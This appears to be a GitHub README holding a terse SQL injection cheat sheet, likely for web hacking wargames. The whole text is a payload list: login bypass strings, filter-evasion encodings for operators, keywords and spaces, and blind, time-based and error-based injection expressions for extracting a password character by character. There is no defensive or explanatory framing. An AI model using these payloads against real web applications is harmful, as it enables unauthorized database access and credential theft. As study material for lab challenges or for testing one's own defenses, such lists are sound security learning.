
#web_hacking #SQLinjection

Primary LanguagePython


#web_hacking #SQLinjection

?pw=' or 1=1 --%20
?pw like "a%"
?pw like "a_b_c"
?id in ("admin")
or -> ||
and -> %26%26
admin -> 0x61646d696e
0x -> 0b

bypass ' '

    %09 (\t)
    %0a (\n)
    %0d (\r)

Blind SQL injection

    ord(substr(pw,2,1)) > 5
    substr(pw,2,1) > char(5)
    substring(pw,2,1) > char(5)
    substr(pw from 2 for 1) > char(5)

Time-based SQL injection

    if((ord(substr(pw,2,1)>5), (sleep(2)), 1)
    id='admin' and length(pw)=10 and sleep(2)

Error-based SQL injection

    if(ord(substr(pw,2,1)>5, (select 1 union select 2), 1)
    order by (select 1 union select length(pw)<10)
  • limit 0,1
  • and>or
  • if there is # -> use Line Feed!
  • if you want to make the query error, pw=1=(select 1 union select 2)
  • ereg -> %00, case sensitive